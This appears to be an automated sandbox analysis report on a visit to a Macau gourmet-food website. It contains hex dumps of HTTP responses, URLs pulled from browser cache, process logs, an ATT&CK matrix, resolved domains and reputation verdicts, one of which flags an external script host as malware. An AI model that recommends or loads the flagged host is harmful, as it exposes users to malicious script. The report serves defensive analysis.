54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Mon, 13 Mar 2023 04:26:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
Source: chromecache_166.1.drString found in binary or memory: http://creativecommons.org/licenses/by/2.5/
Source: chromecache_220.1.drString found in binary or memory: http://diveintomark.org/)
Source: chromecache_220.1.drString found in binary or memory: http://encytemedia.com/)
Source: chromecache_260.1.drString found in binary or memory: http://fontawesome.io
Source: chromecache_260.1.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_250.1.drString found in binary or memory: http://gourmethousemacau.com/m.html
Source: chromecache_166.1.drString found in binary or memory: http://huddletogether.com/projects/lightbox2/
Source: chromecache_173.1.drString found in binary or memory: http://jquery.org/license
Source: chromecache_220.1.dr, chromecache_262.1.drString found in binary or memory: http://mir.aculo.us)
Source: chromecache_200.1.drString found in binary or memory: http://prototype.conio.net/
Source: chromecache_228.1.drString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: chromecache_220.1.dr, chromecache_262.1.drString found in binary or memory: http://script.aculo.us
Source: chromecache_249.1.drString found in binary or memory: http://tongji.baidu.com/hm-web/welcome/ico
Source: chromecache_166.1.drString found in binary or memory: http://www.faqts.com/knowledge_base/view.phtml/aid/1602
Source: chromecache_237.1.dr, chromecache_252.1.dr, chromecache_235.1.dr, chromecache_158.1.dr, chromecache_250.1.drString found in binary or memory: http://www.hkwp.com
Source: chromecache_166.1.drString found in binary or memory: http://www.huddletogether.com
Source: chromecache_252.1.drString found in binary or memory: http://www.metacafe.com/watch/977111/video/R/CFD_1002/
Source: chromecache_166.1.drString found in binary or memory: http://www.uptonic.com/)
Source: chromecache_173.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_173.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_173.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_173.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_173.1.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_173.1.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_173.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_173.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_173.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_173.1.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_173.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_173.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_173.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_249.1.drString found in binary or memory: https://fclog.baidu.com/log/ocpcagl?type=behavior&emd=euc
Source: chromecache_173.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_173.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: chromecache_173.1.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_173.1.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_173.1.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_249.1.drString found in binary or memory: https://goutong.baidu.com/site/
Source: chromecache_228.1.drString found in binary or memory: https://hm.baidu.com/hm.js?3eff88a357a8c5aca6bb583a65de2875
Source: chromecache_249.1.drString found in binary or memory: https://hmcdn.baidu.com/static
Source: chromecache_249.1.drString found in binary or memory: https://hmcdn.baidu.com/static/tongji/plugins/
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespace
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_173.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_173.1.drString found in binary or memory: https://jquery.com/
Source: chromecache_173.1.drString found in binary or memory: https://jquery.org/license
Source: chromecache_228.1.drString found in binary or memory: https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba
Source: chromecache_173.1.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_173.1.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_173.1.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_228.1.drString found in binary or memory: https://s.360.cn/so/zz.gif
Source: chromecache_223.1.drString found in binary or memory: https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js
Source: chromecache_173.1.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_228.1.drString found in binary or memory: https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif
Source: chromecache_173.1.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_173.1.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
Source: chromecache_158.1.dr, chromecache_250.1.drString found in binary or memory: https://www.elevenkicks.com/air-jordan-5-grape-p-997.html
Source: chromecache_250.1.drString found in binary or memory: https://www.elevenkicks.com/yeezys-c-17_18.html
Source: chromecache_158.1.dr, chromecache_250.1.drString found in binary or memory: https://www.felchlin.com
Source: chromecache_228.1.drString found in binary or memory: https://www.mcf49.com:9168/?agent_code=3387088
Source: chromecache_228.1.drString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
Source: classification engineClassification label: mal48.win@30/125@23/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1680,i,17073344616250618205,18426531208198070436,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.gourmethousemacau.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1680,i,17073344616250618205,18426531208198070436,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_01
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath Interception1
Process Injection
2
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth5
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration6
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://www.gourmethousemacau.com/0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/1%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://promisesaplus.com/#point-750%URL Reputationsafe
https://promisesaplus.com/#point-640%URL Reputationsafe
https://promisesaplus.com/#point-610%URL Reputationsafe
http://www.gourmethousemacau.com/SysImages/first.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/SysImages/Prev.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/js/effects.js0%Avira URL Cloudsafe
https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/loading.gif0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/m/static/css/font-awesome.min.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/closelabel.gif0%Avira URL Cloudsafe
https://www.elevenkicks.com/air-jordan-5-grape-p-997.html0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu06.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/SysImages/Last.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/uploadfiles/SRL_9_1_3754306.jpg0%Avira URL Cloudsafe
http://encytemedia.com/)0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/main.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/css/lightbox.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/pic_chocology.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/m/static/js/index.js0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/m/static/js/jquery-1.11.3.min.js0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/title_chocology.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/topbanner.jpg0%Avira URL Cloudsafe
http://huddletogether.com/projects/lightbox2/0%Avira URL Cloudsafe
https://www.tbty20000.com/tb.js100%Avira URL Cloudmalware
http://www.gourmethousemacau.com/m/static/css/index_ipad.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/title_aboutus.jpg0%Avira URL Cloudsafe
http://www.huddletogether.com0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/title_products.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu03b.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu06b.jpg0%Avira URL Cloudsafe
http://www.faqts.com/knowledge_base/view.phtml/aid/16020%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu03.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/icon_photo.jpg0%Avira URL Cloudsafe
https://www.elevenkicks.com/yeezys-c-17_18.html0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/uploadfiles/SRL_3_1_3752094.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu_bg.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/copyrightbg.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu04b.jpg0%Avira URL Cloudsafe
https://www.mcf49.com:9168/?agent_code=33870880%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu05.jpg0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/productMain_icon.jpg0%Avira URL Cloudsafe
http://diveintomark.org/)0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/static/bootstrap/css/bootstrap.min.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/m/static/js/jquery.min.js0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/js/scriptaculous.js?load=effects0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/m/static/font-icon/font-awesome.min.css0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu05b.jpg0%Avira URL Cloudsafe
http://mir.aculo.us)0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/js/prototype.js0%Avira URL Cloudsafe
http://www.gourmethousemacau.com/images/menu01.jpg0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.gourmethousemacau.com
59.188.3.132
truefalse
    unknown
    elevenkicks.com
    198.55.28.26
    truefalse
      unknown
      share.n.shifen.com
      39.156.68.163
      truefalse
        unknown
        www.tbty20000.com
        23.251.32.116
        truefalse
          unknown
          api.share.n.shifen.com
          39.156.68.163
          truefalse
            unknown
            accounts.google.com
            142.250.203.109
            truefalse
              high
              www.ckjju.com
              188.114.96.3
              truefalse
                unknown
                www.uuecd.com
                104.21.22.56
                truefalse
                  unknown
                  jspassport.ssl.qhimg.com.webcdn.360qhcdn.com
                  104.192.108.23
                  truefalse
                    unknown
                    d22oj5itccz3aw.cloudfront.net
                    65.9.25.112
                    truefalse
                      high
                      hm.e.shifen.com
                      103.235.46.191
                      truefalse
                        unknown
                        felchlin.com
                        149.126.4.76
                        truefalse
                          unknown
                          www.wshifen.com
                          104.193.88.123
                          truefalse
                            unknown
                            www.google.com
                            142.250.203.100
                            truefalse
                              high
                              clients.l.google.com
                              142.250.203.110
                              truefalse
                                high
                                s.360.cn
                                171.8.167.89
                                truefalse
                                  high
                                  www.hkwp.com
                                  43.241.73.144
                                  truefalse
                                    unknown
                                    windowsupdatebg.s.llnwi.net
                                    178.79.242.0
                                    truefalse
                                      unknown
                                      push.zhanzhang.baidu.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.metacafe.com
                                        unknown
                                        unknownfalse
                                          high
                                          jspassport.ssl.qhimg.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.elevenkicks.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              api.share.baidu.com
                                              unknown
                                              unknownfalse
                                                high
                                                clients2.google.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  sp0.baidu.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    hm.baidu.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      s.ssl.qhres2.com
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.felchlin.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.gourmethousemacau.com/OurProducts.aspfalse
                                                            unknown
                                                            http://www.gourmethousemacau.com/SysImages/Prev.jpgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.gourmethousemacau.com/js/effects.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.gourmethousemacau.com/SysImages/first.jpgfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.gourmethousemacau.com/AboutUs.aspfalse
                                                              unknown
                                                              https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.gourmethousemacau.com/OurProducts.aspfalse
                                                                unknown
                                                                http://www.gourmethousemacau.com/images/loading.giffalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.gourmethousemacau.com/m/static/css/font-awesome.min.cssfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.gourmethousemacau.com/images/closelabel.giffalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://api.share.baidu.com/s.gif?l=http://www.gourmethousemacau.com/false
                                                                  high
                                                                  http://www.gourmethousemacau.com/images/menu06.jpgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://hm.baidu.com/hm.js?3eff88a357a8c5aca6bb583a65de2875false
                                                                    high
                                                                    http://www.gourmethousemacau.com/SysImages/Last.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/uploadfiles/SRL_9_1_3754306.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/css/lightbox.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/main.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/images/pic_chocology.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/m/static/js/index.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.gourmethousemacau.com/OurChocology.aspfalse
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/m/static/js/jquery-1.11.3.min.jsfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/title_chocology.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/topbanner.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.tbty20000.com/tb.jsfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/m/static/css/index_ipad.cssfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/title_aboutus.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/title_products.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/menu03b.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/images/menu06b.jpgfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.gourmethousemacau.com/AboutUs.aspfalse
                                                                        unknown
